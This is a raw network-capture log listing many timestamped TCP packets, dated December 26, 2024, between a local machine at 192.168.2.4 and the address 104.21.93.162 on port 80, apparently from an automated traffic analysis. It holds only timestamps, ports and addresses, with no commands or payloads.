                                                                                                                              Dec 26, 2024 17:18:34.907489061 CET8049898104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:34.907499075 CET8049898104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:34.927345991 CET4989280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:35.020493031 CET4989280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:35.024590015 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:35.140430927 CET8049892104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:35.140486002 CET4989280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:35.144377947 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:35.144450903 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:35.144561052 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:35.264204025 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:35.489938974 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:35.609697104 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:35.609708071 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:35.609716892 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:35.623749971 CET8049898104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:35.677397966 CET4989880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:35.869573116 CET8049898104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:35.911653042 CET4989880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.322590113 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.380486965 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.573695898 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.614799023 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.710114002 CET4989880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.710164070 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.710916042 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.830492973 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.830653906 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.830749035 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.830761909 CET8049898104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.830831051 CET4989880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.830949068 CET8049899104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.831001043 CET4989980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.850162983 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.950710058 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.970168114 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:36.970242977 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:36.970320940 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:37.089906931 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.177422047 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:37.299699068 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.299768925 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.299798965 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.318070889 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:37.437980890 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:37.438014030 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.008965969 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.052297115 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.149158955 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.192929983 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.262115955 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.302290916 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.579509974 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.579664946 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.579716921 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.728148937 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.728271961 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:38.848088026 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.848417997 CET8049905104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:38.848491907 CET4990580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.061249018 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.061434984 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.181955099 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.181987047 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.182022095 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.579225063 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.599834919 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.600544930 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.703912020 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.719854116 CET8049906104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.719938993 CET4990680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.720094919 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.720164061 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.720262051 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.823728085 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.823828936 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.825892925 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:39.839814901 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:39.945653915 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.068140984 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:40.177405119 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:40.188564062 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.188673973 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.297118902 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.297137976 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.297159910 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.897283077 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:40.942914009 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.001554012 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.067914963 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.149702072 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.192914009 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.253739119 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.302299023 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.497581959 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.497639894 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.498364925 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.617966890 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.618032932 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.618165016 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.626816034 CET8049912104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.626847982 CET8049913104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.626862049 CET4991280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.626895905 CET4991380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:41.737720966 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:41.974330902 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.069330931 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.095406055 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.095423937 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.095437050 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.192243099 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.195386887 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.195533037 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.315010071 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.552436113 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:42.672344923 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.672374010 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.795603991 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:42.849160910 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.285592079 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.333524942 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.374866962 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.427287102 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.435101986 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.436470985 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.488003969 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.590105057 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.607925892 CET8049919104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.609452963 CET4991980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.625386000 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.677283049 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.709908009 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:43.713586092 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.717396975 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:43.836921930 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.068008900 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.187815905 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.187851906 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.187935114 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.506572962 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.507762909 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.817915916 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.845474005 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.845752001 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.845799923 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.845803976 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.845887899 CET4992080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.891454935 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.937874079 CET8049920104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:44.943011999 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:44.965400934 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.149710894 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.192915916 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.193017960 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.265377045 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.266058922 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.312680960 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.312827110 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.386312962 CET8049922104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.386385918 CET4992280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.386893034 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.387000084 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.387126923 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.507354975 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.740107059 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:45.859810114 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.859819889 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:45.859828949 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:46.024354935 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:46.068505049 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:46.286910057 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:46.333548069 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:46.565474987 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:46.614797115 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:46.835933924 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:46.880420923 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.046119928 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.099183083 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.148227930 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.148435116 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.149400949 CET4993480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.178862095 CET4993580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.268395901 CET8049927104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.268486023 CET4992780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.268940926 CET8049934104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.269030094 CET4993480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.269145012 CET4993480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.269334078 CET8049928104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.269382954 CET4992880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.298904896 CET8049935104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.298979044 CET4993580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.299079895 CET4993580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.388715982 CET8049934104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.418690920 CET8049935104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.614980936 CET4993480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.646269083 CET4993580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:47.734550953 CET8049934104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.734586000 CET8049934104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.766190052 CET8049935104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.766233921 CET8049935104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:47.766347885 CET8049935104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:48.452908993 CET8049934104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:48.505450010 CET4993480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:48.516638994 CET8049935104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:48.567925930 CET4993580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:48.705521107 CET8049934104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:48.755425930 CET4993480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:48.773500919 CET8049935104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:48.818085909 CET4993580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:48.892213106 CET4993480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:48.892333984 CET4993580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:48.893282890 CET4994080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.012213945 CET8049934104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:49.012273073 CET4993480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.012654066 CET8049935104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:49.012708902 CET4993580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.014230013 CET8049940104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:49.014300108 CET4994080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.014398098 CET4994080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.133985996 CET8049940104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:49.364878893 CET4994080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.484534979 CET8049940104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:49.484580040 CET8049940104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:49.484613895 CET8049940104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:49.538149118 CET4994180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.657798052 CET8049941104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:49.657980919 CET4994180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.658101082 CET4994180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:49.777640104 CET8049941104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.005574942 CET4994180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:50.126002073 CET8049941104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.126012087 CET8049941104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.192792892 CET8049940104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.239825010 CET4994080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:50.446396112 CET8049940104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.489828110 CET4994080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:50.565181017 CET4994080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:50.565937996 CET4994480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:50.685045958 CET8049940104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.685401917 CET8049944104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.685581923 CET4994080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:50.685585022 CET4994480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:50.685636997 CET4994480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:50.805315018 CET8049944104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.839406967 CET8049941104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:50.896044970 CET4994180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:51.036808968 CET4994480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:51.093485117 CET8049941104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:51.146146059 CET4994180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:51.156443119 CET8049944104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:51.156476021 CET8049944104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:51.156487942 CET8049944104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:51.863084078 CET8049944104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:51.896785975 CET4994180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:51.897422075 CET4994880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:51.911772013 CET4994480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.016911983 CET8049941104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.017081022 CET8049948104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.017147064 CET4994180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.017308950 CET4994880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.038904905 CET4994880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.117490053 CET8049944104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.158626080 CET8049948104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.161782026 CET4994480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.404848099 CET4994880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.457179070 CET4994480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.458381891 CET4994980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.526022911 CET8049948104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.526073933 CET8049948104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.577203989 CET8049944104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.577275991 CET4994480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.577914000 CET8049949104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.577989101 CET4994980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.578778982 CET4994980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:52.698477030 CET8049949104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:52.927421093 CET4994980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:53.047149897 CET8049949104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:53.047223091 CET8049949104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:53.047257900 CET8049949104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:53.195504904 CET8049948104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:53.239829063 CET4994880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:53.473581076 CET8049948104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:53.521153927 CET4994880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:53.755889893 CET8049949104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:53.802311897 CET4994980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.013592005 CET8049949104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.067928076 CET4994980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.141237020 CET4994880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.141329050 CET4994980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.142041922 CET4995480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.256427050 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.261512041 CET8049954104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.261575937 CET4995480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.261609077 CET8049948104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.261662006 CET4994880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.261763096 CET4995480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.262294054 CET8049949104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.262357950 CET4994980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.376142025 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.376216888 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.376370907 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.381239891 CET8049954104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.496159077 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.615606070 CET4995480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.724273920 CET4995580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:18:54.735511065 CET8049954104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.735522985 CET8049954104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.735531092 CET8049954104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.843857050 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:54.843945980 CET8049955104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:55.439224958 CET8049954104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:18:55.489799023 CET4995480192.168.2.4104.21.93.162
